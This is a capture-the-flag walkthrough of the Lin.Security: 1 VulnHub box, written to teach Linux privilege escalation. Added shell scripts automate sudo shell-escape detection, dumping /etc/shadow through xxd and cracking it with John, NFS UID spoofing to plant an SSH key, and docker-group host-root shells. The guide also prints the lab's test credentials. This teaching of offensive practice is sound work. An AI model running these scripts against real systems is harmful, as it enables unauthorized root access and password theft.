Lin.Security: 1 - VulnHub Box
Box Information
Name: Lin.Security: 1
Release: 11 JUL 2018
Creator: In.security
User Level Difficulty: Easy & Intermediate
Root Level Difficulty: Easy & Intermediate
Prerequisites
The following topics are beneficial in understanding how this box can be exploited.
- Entry Level Knowledge
Description
This box focuses on poor system administration practices. It includes lessons where the user already has access to the box and must escalate privileges, as well as lessons on gaining user-level access remotely. It covers a broad range, from file-level access to service-level access. Once this box has been completed, you will have a deeper understanding of system administration practices.
There are a few initial user-level access points. This guide covers the initial access and how to escalate privileges to root.
Privilege escalation is covered via numerous vulnerabilities, each in detail. No previous knowledge is needed to understand the practices taught in this guide.
Methodologies Used
The following methodologies were used during the exploitation of this box.
- Enumeration
- Port Scanning
- Service Scanning
- Permission Scanning
- Vulnerability Exploitation
- Network File Share (NFS) Weak Permissions
- Public & Private Key Use
- SSH
- Service Use & Capability Understanding
Enumeration
Port Scanning
NMAP
Start off by scanning the ports & services exposed by the box. Document the discoveries.
HINT: use NMAP's manual or help menu to find the flags for "TCP" & "Version" scanning.
- Spoiler - NMAP Scan
Service Scanning
NFS Scanning
NFS scanning can show directories that have been exported to the public. Publicly available exports might host important data; worse, an export of a user's home directory lets any remote client that can mount it plant files that grant local access.
showmount is a command that queries the mount daemon on a remote host for information about the state of the NFS server on that machine, in particular its export list.
Become familiar with using showmount to "show the NFS server's export list".
- Spoiler - NFS Scan
Permission Scanning
Group File Permission Scanning
Using standard Linux commands, any user is able to find and list files and display their permissions.
To list files use the ls command. Read the manual for ls to become familiar with it.
To find files use the find command. Read the manual for find to become familiar with it.
You can combine these two commands to fine-tune the output: find selects the files and ls -l displays their owner, group and mode. In this example, the file "test.txt" has been created within /home/susan and its permissions have been changed to "777" (readable, writable and executable by everyone), which is exactly the kind of file a permission scan should surface.
Superuser Permissions
On Unix-like systems, the sudo command allows a user to run a command with superuser rights (or as another user, depending on the sudoers policy).
Finding out if & what sudo rights a user has is one of the most common checks a penetration tester makes. Become familiar with how sudo can be used; it will be used later in this guide.
HINT: use SUDO's manual or help menu to find the flag to "list user's privileges".
- Spoiler - SUDO List
Bob
This box has been delivered with credentials for the user "bob". The focus for the user "bob" is to teach how a penetration tester can enumerate a box they have access to. Hopefully, during this enumeration the penetration tester can either pivot to a different user or elevate to ROOT.
Many of the commands this user can run via sudo give us the desired end goal of our penetration test (i.e. root access). This user allows you to practice using those commands and become familiar with them.
Account details for the user "bob":
ACCOUNT: bob
PASSWORD: secret
GROUPS: 1004(bob)
Boot up the box & log into the box with the provided user credentials.
NOTE: You can either log into the box locally OR log into the box remotely using SSH.
Method 1 - USER to ROOT
In the enumeration section of this guide, enumerating sudo rights was discussed. We'll start off by simply seeing if this user can run commands as ROOT. List the SUDO rights of the user "bob".
NOTE: There will be a password prompt for running SUDO. See if you can figure out the password.
- Spoiler - BOB SUDO List
Immediately we see that the user bob can run many commands as root using sudo. bob was also lazy and reused his weak login password; since sudo asks for the invoking user's own password, that prompt is no obstacle.
ASH
ASH, the Almquist shell, is a lightweight Unix shell. It is the clone of the System V.4 variant of the Bourne shell.
- Spoiler - ASH ROOT ACCESS
AWK
Gawk (GNU awk) interprets a special-purpose programming language that makes it possible to handle simple data-reformatting jobs with just a few lines of code. Section 9.1.4, Input/Output Functions, of the gawk manual lists its built-in functions. One of them, system(command), runs the operating-system command string and returns the command's exit status to the gawk program; the command itself inherits gawk's terminal, so an interactive program such as a shell works as expected.
With this understanding, let's see if we can get a root shell for the user bob by calling system() from a gawk program run through sudo.
- Spoiler - AWK ROOT ACCESS
BASH
GNU Bash is the GNU Project's shell.
Having sudo access to bash is a critical misconfiguration: running bash via sudo simply hands us a root shell, which is the goal.
- Spoiler - BASH ROOT ACCESS
SH
SH, or the bourne shell, is a command-line interpreter. It is the default shell for Version 7 Unix.
- Spoiler - SH ROOT ACCESS
CSH
csh, the C shell, is a command-line interpreter whose syntax is modelled on the C programming language.
- Spoiler - CSH ROOT ACCESS
DASH
DASH, the Debian Almquist shell, is focused on POSIX conformance & slim implementation.
- Spoiler - DASH ROOT ACCESS
ED
ed is the original Unix line editor. Like vi, it can run a shell command from inside the editor (the ! escape), so an editor that runs as root can start a shell as root.
ENV
env is a standard Unix command. It can either print the environment variables or run another utility in a modified environment. Read the documentation and see if you can get a root shell using env.
- Spoiler - ENV ROOT ACCESS
EXPECT
Expect is a scripting language (an extension of Tcl) used to automate control of interactive applications such as telnet, FTP, passwd, fsck, rlogin, tip, SSH and others.
Expect has a particular command, spawn, which starts a program as a new interactive process; with the interact command the user is then connected to that process, so a spawned shell can be driven from the terminal.
After becoming familiar with EXPECT, see if you can get a ROOT shell using the spawn() function.
- Spoiler - EXPECT ROOT ACCESS
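The whole of Method 1 rests on one enumeration step: reading the sudo -l output and spotting which of the permitted programs give a shell. The script below is an added example (it is not part of the original guide and not the box's real sudoers output): it parses sudo -l text into program paths and flags the ones this guide shows escaping to a root shell. The sample fed to it in testing is constructed, and the ESCAPES list is limited to the programs covered above plus gawk.

```sh
#!/bin/sh
# Added example, not from the original guide: parse "sudo -l" output and flag the
# entries that hand over a shell. Program list and sample input are illustrative.

# Print one program path per line from "sudo -l" text on stdin. Handles "(ALL)",
# "(root : root)", tags such as NOPASSWD:, comma-separated entries, and entries
# that carry arguments (only the program path is kept).
parse_sudo_list() {
    awk '
        /may run the following commands/ { grab = 1; next }
        grab && NF {
            n = split($0, parts, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                p = parts[i]
                sub(/^[ \t]*\([^)]*\)[ \t]*/, "", p)        # drop "(ALL)" / "(root : root)"
                while (sub(/^[A-Z]+:[ \t]*/, "", p)) { }    # drop NOPASSWD:, SETENV:, ...
                split(p, f, " ")
                if (f[1] != "") print f[1]
            }
        }'
}

# Programs this guide shows escaping to a root shell under sudo (gawk added because
# that is the awk implementation discussed above). Anything else needs case-by-case review.
ESCAPES="ash awk gawk bash sh csh dash ed env expect strace"

# Filter stdin (one path per line) down to the known shell-escape programs.
flag_shell_escapes() {
    while IFS= read -r path; do
        base=${path##*/}
        case " $ESCAPES " in
            *" $base "*) printf '%s\n' "$path" ;;
        esac
    done
}

# Standalone use on the box (sudo will prompt for the current user's password):
if [ "${1:-}" = "run" ]; then
    sudo -l | parse_sudo_list | flag_shell_escapes
fi
```

Run it as "sh sudo_escapes.sh run" on the target; every path it prints is a candidate for the one-line shell escapes discussed in the sections above, and anything it does not print still deserves a look at its man page for a way to run a command.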
Method 2 - USER to USER
Susan
Sometimes, you are not able to gain immediate ROOT access on a compromised box. However, you might be able to gain the permissions of another user. Maybe this user is part of a group that has permissions to services not available to the current user.
USER accounts normally have personal folders. For example, BOB has the personal folder /home/bob. What other users' folders are we able to see on this box?
HINT: Use standard Linux console commands to list the contents of the standard directory for user home folders.
- Spoiler - USER ENUMERATION
After listing the folders, we see that we have both read (r) and execute (x) access to the other users' home directories. This means we can list and enter them. Enumerate both users. Remember to list not only normal files/folders but "hidden" files/folders (names starting with a dot) as well.
- Spoiler - CLEAR TEXT PASSWORD
Now that we have found a password in clear text, lets see if it works. Using standard LINUX commands (s)witch (u)ser using the name & password we have found.
- Spoiler - SWITCH USER
Congratulations! We have successfully enumerated what bob has access to, found a password stored in clear text, and gained access to a different user on the box.
Insecurity
One of the most commonly read files during enumeration is /etc/passwd. It stores user account information and, on older or misconfigured systems, sometimes even password hashes.
After reading the file, we see five real user accounts among the system accounts.
Historically, Unix stored the DES-based crypt(3) hash of each password in /etc/passwd itself, before shadow passwords moved them into /etc/shadow. One entry here still does. With the right format argument, a password cracker can attack that hash.
- Spoiler - JOHN DES DECRYPT
Now we have a clear-text password for the user "insecurity". This is continued in the Insecurity section.
Insecurity
With the credentials discovered in the Bob section, SSH into the box and run the Linux id command.
Congratulations! Sometimes privilege escalation is easy, as long as we know what we are looking for.
Susan
This account teaches a deeper understanding of local enumeration. We need to fully understand who this user is, what they have permission to, and lastly what group they are part of and what that means.
Account details for the user "susan":
ACCOUNT: susan
PASSWORD: obtained VIA user BOB
GROUPS: 1007(itservices)
In the enumeration section of this guide, we discussed finding and listing files. We can use a similar method to enumerate all the files on the computer and see whether the user or the group has access to something we can use to gain root permissions.
HINT: use the GREP command to filter out group: itservices
- Spoiler - LIST GROUP ACCESSIBLE FILES/SERVICES
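The Group File Permission Scanning section and the Susan section both come down to the same sweep: find files by mode or ownership, then show who owns them. The script below is an added example, not code from the original guide, and generalises that sweep to the three checks a tester runs first on any Linux host: world-writable files, setuid/setgid binaries, and everything owned by a given group (itservices is assumed as the default group name).

```sh
#!/bin/sh
# Added example, not from the original guide: permission-based file enumeration.
# Default group name "itservices" is the one from this box; pass another as $2.

# World-writable regular files below $1 (other-write bit set, octal 002).
find_world_writable() {
    find "$1" -xdev -type f -perm -002 2>/dev/null
}

# Setuid (4000) or setgid (2000) regular files below $1. A root-owned setuid binary
# that only one group may execute (the xxd case on this box) shows up here.
find_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Regular files below $1 whose group is $2 (group name or numeric GID).
find_group_files() {
    find "$1" -xdev -type f -group "$2" 2>/dev/null
}

# Long listing of whatever the finders print, so owner, group and mode are visible at once.
show() {
    xargs -r ls -ld --     # GNU xargs -r: do nothing when the finder found nothing
}

if [ "${1:-}" = "run" ]; then
    grp=${2:-itservices}
    echo "== world-writable files =="; find_world_writable / | show
    echo "== setuid/setgid files ==";  find_suid_sgid / | show
    echo "== files owned by group $grp =="; find_group_files / "$grp" | show
fi
```

Run as "sh permscan.sh run itservices". The -xdev keeps find on the root filesystem so /proc and NFS mounts do not flood the output, and the 2>/dev/null discards the permission-denied noise from directories an unprivileged user cannot enter.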
XXD
xxd is a hex dump tool. It can read any file and print its hex dump; it can also convert a hex dump back into the original bytes (-r).
Obtaining a root shell directly with xxd is not possible. However, this copy of xxd is owned by root, runs with root's file-access rights, and only the group itservices may execute it. How can a penetration tester use a program that prints the hex dump of any file it can read?
HINT: Have xxd dump a file in hex and then convert the hex back into readable text. Maybe a file only root can read?
- Spoiler - ENCRYPTED PASSWORDS
JOHN THE RIPPER
John the Ripper is a popular password-cracking tool. Read the manual and become familiar with it, as the next part of this guide is focused on cracking the passwords we have just discovered.
At this point, you will have to move over to your hacking VM. Copy both the Lin.Security 1 passwd and shadow files over to your hacking VM. Now combine the two into an "unshadow" file (John ships the unshadow utility for exactly this).
- Spoiler - UNSHADOW
Using JOHN we can start to crack the passwords within the unshadow file.
NOTE: Eventually, we will be stuck with 2 hashes which JOHN did not crack.
- Spoiler - JOHN
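The XXD and John the Ripper steps above involve three small pieces of file handling that are easy to get wrong: spotting which /etc/passwd entries still carry a hash, recognising the hash type so John is given the right --format, and merging passwd and shadow the way unshadow does. The script below is an added example, not code from the original guide; the passwd and shadow lines used in testing are constructed and the hashes in them are placeholders, not the box's. The wordlist path in the run section is assumed.

```sh
#!/bin/sh
# Added example, not from the original guide: the file handling behind the XXD and JOHN steps.

# Users whose /etc/passwd entry still carries a hash in field 2 (not x, *, or !...).
passwd_hashes() {
    awk -F: '$2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print $1 ":" $2 }' "$1"
}

# Rough crypt(3) classifier by prefix and length. Names match John's --format names
# where one exists (descrypt, md5crypt, sha256crypt, sha512crypt).
classify_hash() {
    case "$1" in
        '$6$'*)          echo sha512crypt ;;
        '$5$'*)          echo sha256crypt ;;
        '$1$'*)          echo md5crypt ;;
        '$y$'*)          echo yescrypt ;;
        '$'*)            echo unknown-modular ;;
        '' | '*' | '!'*) echo none ;;
        *)  if [ "${#1}" -eq 13 ]; then echo descrypt; else echo unknown; fi ;;
    esac
}

# The merge unshadow(8) performs: each passwd line with field 2 replaced by the
# shadow hash for that user. $1 = passwd file, $2 = shadow file.
unshadow_merge() {
    awk -F: -v OFS=: '
        FILENAME == ARGV[1] { hash[$1] = $2; next }   # first file: shadow
        ($1 in hash) { $2 = hash[$1] }
        { print }' "$2" "$1"
}

# Read a root-only file through the itservices-executable xxd and undo the hex dump.
dump_via_xxd() {
    xxd "$1" | xxd -r
}

if [ "${1:-}" = "run" ]; then
    dump_via_xxd /etc/shadow > shadow.txt
    cp /etc/passwd passwd.txt
    echo "hashes still in passwd:"; passwd_hashes passwd.txt
    unshadow_merge passwd.txt shadow.txt > unshadowed.txt
    john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt   # wordlist path assumed
fi
```

The classifier matters for the "insecurity" entry: a bare 13-character hash in /etc/passwd is traditional DES crypt, which John handles as --format=descrypt, while the entries pulled from /etc/shadow on a modern Ubuntu are $6$ sha512crypt and crack far more slowly.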
Now that we have cracked the ROOT password, all that is left is to switch to ROOT.
Congratulations! To recap what we have learned to gain root VIA this method we have done the following:
- Used the USER "bob" to find USER "susan" credentials.
- Enumerated who the USER "susan" is.
- Found & listed services the USER "susan" has access to.
- Used xxd to dump a root-restricted file in hex and converted the hex back into a readable file.
- Cracked the password hashes to obtain the root password.
- Gained access to ROOT.
Peter
Peter is going to take everything you have previously learned, and more, to successfully hack this route! Time to dive in.
In the enumeration section, we discussed how to display NFS exports that are publicly accessible. This is very dangerous, especially when the exported directory is a user's home directory: whoever can mount it can write into that user's .ssh directory.
Attempt to display & mount the publicly available export.
- Spoiler - NFS Show & Mount
Now that the export has been mounted, we can enumerate it. This is where things get a bit tricky: a bit of SSH key pair understanding is required to obtain access to peter's account.
---STOP--- Before reading any further, attempt to see if you can figure out how to gain access!
Now that we have a list of the directory contents, the most important thing to understand is that a user's SSH keys and authorized_keys file live in /home/[user]/.ssh. However, if you look at the ownership of the mounted directory, the user & group IDs associated with it are most likely not the same as those of the user you are logged in as on your hacking VM, so you cannot write there yet.
- Spoiler - NFS LIST
USER: 1001
GROUP: 1005
The weakness here is that NFS, with its default sec=sys authentication, trusts the numeric user ID and group ID the client presents. It does not matter whether those IDs belong to a real account on the server: any client that mounts the export and acts as UID 1001 / GID 1005 is treated as the directory's owner. Root is the one exception, since root_squash (on by default) maps UID 0 to nobody, which is why we create an ordinary local user with the right IDs instead of writing as root. We are going to trick NFS into thinking we are that user.
Read the manual for the USERADD service. Find the argument to specify the User ID.
Read the manual for the GROUPADD service. Find the argument to specify the Group ID.
Read the manual for the USERMOD service.
- Spoiler - NFS ADDUSER
Now that we have a local user with the same UID and GID as the mounted directory's owner, we need to understand how an SSH key pair works. ssh-keygen creates a key pair: a private key, which stays on the hacking VM, and a public key, which goes into the target user's authorized_keys file. We can use it to create the key pair on the hacker box, switch to the UID 1001 / GID 1005 user, append the public key to .ssh/authorized_keys on the mounted directory, and SSH into the box as that user.
Start by making the SSH pair.
- Spoiler - SSH-KEYGEN RSA TOKEN
Next, append the public key to the user's authorized_keys file on the mounted directory.
NOTE: this step needs to be done by the user with UID 1001 & GID 1005, so that the NFS server accepts the write.
NOTE: that user must be able to read the public key file (.pub) you generated as a different local user, so adjust its permissions or generate the pair as that user. The private key never goes to the target and must not be made world-readable; ssh refuses to use a private key with permissions that loose.
- Spoiler - Upload the key pair
Once the public key has been appended to authorized_keys on the mounted directory, we should be able to SSH into the box as the user name associated with it.
NOTE: SSH's -i argument selects the private key (identity file) to use for the login.
- Spoiler - SSH Login
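The NFS steps above (showmount, mount, create a matching local user, generate a key pair, append the public key, log in with -i) are one procedure, so here it is as a single script. This is an added example, not code from the original guide. The target address 192.168.56.101, the export path /home/peter, the remote login name peter and the local shadow account name nfsuser are assumed, as is the UID 1001 / GID 1005 ownership shown above. Only the two parsing helpers run offline; takeover needs root on the attacking VM (for mount and useradd) and the nfs-common client package.

```sh
#!/bin/sh
# Added example, not from the original guide: NFS export -> SSH key takeover as one script.
# Assumed: target 192.168.56.101 exports /home/peter owned by UID 1001 / GID 1005, remote login
# name peter, local shadow account "nfsuser". takeover needs root on the attacking VM.

# Turn "showmount -e" output into "export client" lines, skipping the "Export list for ..." header.
parse_exports() {
    awk 'NR > 1 && NF >= 2 { print $1, $2 }'
}

# Build the authorized_keys line from a *public* key file. Refuses a private key (the classic
# mistake here) and drops the trailing comment so the attacker's hostname is not left on the target.
authorized_line() {
    if grep -q 'PRIVATE KEY' "$1"; then
        echo "refusing: $1 is a private key; authorized_keys takes the .pub file" >&2
        return 1
    fi
    cut -d' ' -f1,2 "$1"
}

# Local account with the export owner's UID/GID. NFS with sec=sys trusts the IDs the client
# sends; root_squash only squashes UID 0, so an ordinary user with matching IDs is the owner.
shadow_user() {   # $1 = name, $2 = uid, $3 = gid
    groupadd -g "$3" "$1" 2>/dev/null || true
    useradd -u "$2" -g "$3" -M -s /bin/sh "$1"
}

takeover() {      # $1 = target host, $2 = export path, $3 = remote login name, $4 = local shadow user
    mnt=/mnt/nfs
    mkdir -p "$mnt"
    mount -t nfs "$1:$2" "$mnt"
    uid=$(stat -c %u "$mnt"); gid=$(stat -c %g "$mnt")
    shadow_user "$4" "$uid" "$gid"
    ssh-keygen -t ed25519 -N '' -f /tmp/nfs_key          # private key stays here, mode 600
    authorized_line /tmp/nfs_key.pub > /tmp/nfs_key.line
    chmod 644 /tmp/nfs_key.line                          # only the public half is shared with $4
    su -s /bin/sh "$4" -c "mkdir -p $mnt/.ssh && cat /tmp/nfs_key.line >> $mnt/.ssh/authorized_keys && chmod 700 $mnt/.ssh && chmod 600 $mnt/.ssh/authorized_keys"
    echo "now run: ssh -i /tmp/nfs_key $3@$1"
}

if [ "${1:-}" = "run" ]; then
    showmount -e "$2" | parse_exports
    takeover "$2" "$3" "$4" "${5:-nfsuser}"
fi
```

Run as "sudo sh nfs_takeover.sh run 192.168.56.101 /home/peter peter". The chmod 700 on .ssh and 600 on authorized_keys are not cosmetic: sshd's default StrictModes rejects an authorized_keys file that is group- or world-writable, so a sloppy append can leave you locked out even though the key is in place.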
Method 1 - STRACE
We have USER access to the box. Now, back to enumeration to see if we can find a way to escalate to ROOT. Refer to the Superuser Permissions section.
- Spoiler - PETER PERMISSIONS
strace is a debugging tool in Linux. The thing to note is that when a program is traced, it is also run, with whatever privileges strace itself has. We can use this to our advantage: create a C program that uses a C library function to kick off a shell. Refer to my SCRIPTING 101 entry for an introduction on scripting.
After writing the program, compile it with GCC.
- Spoiler - C PROGRAM
With the program built, all that is left is to upload it to the Lin.Security: 1 box. Use your preferred method; I typically use Python's SimpleHTTPServer (python -m SimpleHTTPServer, or python3 -m http.server) and fetch the file with wget or curl.
Once the program is on Lin.Security: 1, make it executable (the guide uses chmod 777, though chmod +x is enough) and trace it via sudo strace. Because strace simply executes whatever it is given, the traced program and the shell it spawns run as root.
- Spoiler - STRACE DEBUG
Congratulations! We have been able to remotely scan this vulnerable box, obtain user access and finish with root via:
- Enumerated the NFS exports.
- Obtained user name information.
- Mounted the user's home directory.
- Created an SSH key pair and uploaded the public key.
- Enumerated what permissions the user has.
- Used these permissions to trace a program containing malicious code.
- Gained access to root.
Method 2 - DOCKER GROUP
During the enumeration phase for the user "peter", it should be noted that the user is part of the "(999) docker" group. Docker is a service to "build, manage and secure your apps anywhere"; or, a lightweight runtime and packaging tool. Most docker commands talk to the Docker daemon, which runs as root, so by default they need sudo, much like any other privileged operation in Linux. A poor practice has become commonplace: putting developers into the docker group, which grants access to the daemon's socket without a password. Since the daemon runs as root and will mount any host path into a container on request, membership in that group is equivalent to root. Exploiting this practice should lead to root-level access.
Reading the docker run manual, there are flags that mount a host directory into the container and attach an interactive terminal. See if you can find them and use them to get an interactive high-privileged shell on the host's filesystem.
- Spoiler - DOCKER SHELL
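The check a tester (or an auditor) wants here is mechanical: is the current user in the docker group, is the daemon socket reachable, and if so, what does the host-root shell look like. The script below is an added example, not code from the original guide. The id output used in testing is constructed, and the alpine image name in docker_root_shell is an assumption (any image with a shell works).

```sh
#!/bin/sh
# Added example, not from the original guide: docker-group membership check and the
# host-root shell it yields. Image name "alpine" is assumed.

# True when the id(1) output on stdin lists a group named exactly "docker".
in_docker_group() {
    grep -Eq '(^|[,=])[0-9]+\(docker\)'
}

# The socket docker-group members can write to; the daemon behind it runs as root.
docker_socket_reachable() {
    [ -w /var/run/docker.sock ]
}

# Mount the host's root filesystem into a container and chroot into it: every file on the
# host is now readable and writable, and "sh" here is a root shell over the host filesystem.
docker_root_shell() {
    docker run --rm -it -v /:/mnt alpine chroot /mnt /bin/sh
}

if [ "${1:-}" = "run" ]; then
    if id | in_docker_group && docker_socket_reachable; then
        docker_root_shell
    else
        echo "not in the docker group, or /var/run/docker.sock is not writable" >&2
    fi
fi
```

The fix on the administration side is the one Docker's own documentation gives: treat docker-group membership as root, so grant it only to people who are allowed root anyway, or run the daemon rootless.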
Congratulations! Understanding that even new services can be used improperly and open up vulnerabilities to attackers is a great skill to have.